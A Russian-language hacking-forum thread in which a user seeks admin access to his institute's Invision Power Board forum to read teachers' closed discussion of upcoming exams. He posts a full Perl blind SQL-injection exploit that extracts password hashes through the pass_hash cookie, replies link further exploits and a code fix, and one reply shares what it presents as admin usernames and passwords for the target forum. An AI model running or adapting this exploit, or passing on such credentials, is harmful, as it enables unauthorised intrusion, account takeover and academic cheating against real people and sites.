Воощем, нада получить доступ к админу по "институтским" соображениям ... Воощем, прошел слушек, что преподаватели общаюЦЦа на форуме в закрытой теме, по поводу грядущих модулях/экзаменах ... Так что важность просто огого ... Значить так, юзал скрипт: Code: use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("Mosiac 1.0" . $ua->agent); if (!$ARGV[0]) {$ARGV[0] = '';} if (!$ARGV[3]) {$ARGV[3] = '';} my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; my $user = $ARGV[1]; my $iver = $ARGV[2]; my $cpre = $ARGV[3]; my $dbug = $ARGV[4]; if (!$ARGV[0] and !$ARGV[1] and !$ARGV[2] and !$ARGV[3]) { print "Input like ./perl ./r57ipb.pl [addres] [userid] [version] [c_fix]\r\n"; print "[addres] = like www.site.com/forum/\r\n"; print "[userid] = user id\r\n"; print "[version] = 1 - v1.0.x or 2 - v2.0.x\r\n"; print "[c_fix] = cookie prefix by defoult its ibf_\r\n"; exit; } my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); my $outputs = ''; for( $i=1; $i < 33; $i++ ) { for( $j=0; $j < 16; $j++ ) { my $current = $charset[$j]; my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*"; my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); my $res = $ua->get($path, @cookie); # If we get a valid sql request then this # does not appear anywhere in the sources $pattern = '<title>(.*)Log In(.*)</title>'; $_ = $res->content; if ($dbug) { print }; if ( !(/$pattern/) ) { $outputs .= $current; print "$i char = $current\n"; last; } } if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; } } print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; exit; # milw0rm.com [2005-05-26] После его использования, получаю хэш из набора нулей... Терь вопрос, на форуме стоит заплатка или просто бок в скрипте... Через приват массаги - тоже не в какую... Думал, может префикс не ibf_, не не одним сплоитом его не узнал, но, думаю, скрипт делает чек на префикс... Заранее благодарен ...
Попробуй почитать сюда http://forum.antichat.ru/thread14205.html, а Coylовский только для 2-х версий.
коуловский кажись на 1 тож пашет.. 2dodlez login oksana pass invision или login Kostik pass 777 там всего 4 админа тока заходи лу4ше в невидимом режиме
Не, тогда не могу. Отсюда можешь взять http://rst.void.ru/download/r57ipb2.txt, а что исправить поищи по форуму. Ну да проблема я вижу уже решена.
Проблема то решена, но вот интерес не угас... А вдруг дальше сталкнусь опять с такой же, что терь, все время вопросы задафать ... cy4_1o1ka, можеш рассказать, как ты действовал, что использовал и т. д. ... Можно ПМ, пожно icq ... Заранее благодарен ...
юзал сплойт rst, ccылку кста азазелло дал те, так что непонятно больше ни4его.. тока там исправить надо вроде чтоб было $allchar .= chr($char); .. надеюсь ты перлом юзал? ))